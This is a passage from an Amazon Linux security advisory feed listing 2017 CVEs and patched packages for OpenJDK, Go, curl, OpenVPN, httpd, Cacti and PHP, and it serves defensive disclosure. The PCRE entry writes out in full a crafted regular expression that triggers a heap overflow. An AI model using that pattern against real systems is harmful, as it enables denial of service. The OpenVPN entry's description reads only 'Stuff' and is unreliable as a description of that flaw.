Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502649:
CVE-2017-10281 OpenJDK: multiple unbounded memory allocations in deserialization (Serialization, 8174109)
CVE-2017-10274:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Smart Card IO). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE accessible data as well as unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).
1502053:
CVE-2017-10274 OpenJDK: CardImpl incorrect state handling (Smart Card IO, 8169026)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10274" title="" id="CVE-2017-10274" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10281" title="" id="CVE-2017-10281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10285" title="" id="CVE-2017-10285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10295" title="" id="CVE-2017-10295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10345" title="" id="CVE-2017-10345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10346" title="" id="CVE-2017-10346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10347" title="" id="CVE-2017-10347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10348" title="" id="CVE-2017-10348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10349" title="" id="CVE-2017-10349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10350" title="" id="CVE-2017-10350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10355" title="" id="CVE-2017-10355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10356" title="" id="CVE-2017-10356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10357" title="" id="CVE-2017-10357" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10388" title="" id="CVE-2017-10388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.151-1.b12.35.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.151-1.b12.35.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.151-1.b12.35.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.151" release="1.b12.35.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-918</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-918: medium priority package update for golang</title><issued date="2017-11-02 20:17:00" /><updated date="2017-11-03 05:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15042:
An unintended cleartext issue exists in Go before 1.8.4 and 1.9.x before 1.9.1. RFC 4954 requires that, during SMTP, the PLAIN auth scheme must only be used on network connections secured with TLS. The original implementation of smtp.PlainAuth in Go 1.0 enforced this requirement, and it was documented to do so. In 2013, upstream issue #5184, this was changed so that the server may decide whether PLAIN is acceptable. The result is that if you set up a man-in-the-middle SMTP server that doesn&#039;t advertise STARTTLS and does advertise that PLAIN auth is OK, the smtp.PlainAuth implementation sends the username and password.
1498867:
CVE-2017-15042 golang: smtp.PlainAuth susceptible to man-in-the-middle password harvesting
CVE-2017-15041:
Go before 1.8.4 and 1.9.x before 1.9.1 allows &quot;go get&quot; remote command execution. Using custom domains, it is possible to arrange things so that example.com/pkg1 points to a Subversion repository but example.com/pkg1/pkg2 points to a Git repository. If the Subversion repository includes a Git checkout in its pkg2 directory and some other work is done to ensure the proper ordering of operations, &quot;go get&quot; can be tricked into reusing this Git checkout for the fetch of code from pkg2. If the Subversion repository&#039;s Git checkout has malicious commands in .git/hooks/, they will execute on the system running &quot;go get.&quot;
1498870:
CVE-2017-15041 golang: arbitrary code execution during go get or go get -d
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15041" title="" id="CVE-2017-15041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15042" title="" id="CVE-2017-15042" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.8.4" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.8.4-1.41.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.8.4" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.8.4-1.41.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.8.4" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang" version="1.8.4" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.8.4-1.41.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.8.4" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.8.4-1.41.amzn1.i686.rpm</filename></package><package name="golang" version="1.8.4" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.8.4-1.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-919</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-919: medium priority package update for curl</title><issued date="2017-11-02 20:18:00" /><updated date="2017-11-03 05:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000254:
libcurl may read outside of a heap allocated buffer when doing FTP. When libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the `PWD` command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses. Due to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path. A malicious server could abuse this fact and effectively prevent libcurl-based clients to work with it - the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault. The simple fact that this has issue remained undiscovered for this long could suggest that malformed PWD responses are rare in benign servers. We are not aware of any exploit of this flaw. This bug was introduced in commit [415d2e7cb7](https://github.com/curl/curl/commit/415d2e7cb7), March 2005. In libcurl version 7.56.0, the parser always zero terminates the string but also rejects it if not terminated properly with a final double quote.
1495541:
CVE-2017-1000254 curl: FTP PWD response parser out of bounds read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000254" title="" id="CVE-2017-1000254" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-11.78.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-11.78.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-11.78.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-11.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-920</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-920: medium priority package update for openvpn</title><issued date="2017-11-02 20:19:00" /><updated date="2017-11-03 05:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12166:
Stuff
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12166" title="" id="CVE-2017-12166" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.4.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.4-1.21.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.4-1.21.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.4-1.21.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.4-1.21.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.4-1.21.amzn1.i686.rpm</filename></package><package name="openvpn-devel" version="2.4.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.4-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-921</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-921: medium priority package update for httpd</title><issued date="2017-11-02 20:21:00" /><updated date="2017-11-03 05:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12171:
A regression was found in the Red Hat Enterprise Linux 6.9 version of httpd, causing comments in the &quot;Allow&quot; and &quot;Deny&quot; configuration lines to be parsed incorrectly. A web administrator could unintentionally allow any client to access a restricted HTTP resource.
1493056:
CVE-2017-12171 httpd: # character matches all IPs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12171" title="" id="CVE-2017-12171" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.34" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.34-1.16.amzn1.noarch.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.34-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-922</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-922: medium priority package update for curl</title><issued date="2017-11-15 19:54:00" /><updated date="2017-11-20 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000257:
A buffer overrun flaw was found in the IMAP handler of libcurl. By tricking an unsuspecting user into connecting to a malicious IMAP server, an attacker could exploit this flaw to potentially cause information disclosure or crash the application.
1503705:
CVE-2017-1000257 curl: IMAP FETCH response out of bounds read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000257" title="" id="CVE-2017-1000257" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-12.79.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-12.79.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-12.79.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-12.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-923</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-923: medium priority package update for cacti</title><issued date="2017-11-15 19:56:00" /><updated date="2017-11-20 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15194:
include/global_session.php in Cacti 1.1.25 has XSS related to (1) the URI or (2) the refresh page.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15194" title="" id="CVE-2017-15194" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="2.18.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-2.18.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-924</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-924: important priority package update for php56 php70 php71</title><issued date="2017-11-15 20:05:00" /><updated date="2017-11-20 21:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1283:
The pcre_compile2 function in pcre_compile.c in PCRE 8.38 mishandles the /((?:F?+(?:^(?(R)a+\\&quot;){99}-))(?J)(?&#039;R&#039;(?&#039;R&#039;&lt;((?&#039;RR&#039;(?&#039;R&#039;\\){97)?J)?J)(?&#039;R&#039;(?&#039;R&#039;\\){99|(:(?|(?&#039;R&#039;)(\\k&#039;R&#039;)|((?&#039;R&#039;)))H&#039;R&#039;R)(H&#039;R))))))/ pattern and related patterns with named subgroups, which allows remote attackers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
1295385:
CVE-2016-1283 pcre: heap buffer overflow in handling of duplicate named groups (8.39/14)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1283" title="" id="CVE-2016-1283" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-ldap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.32" release="1.135.amzn1" epoch="0" 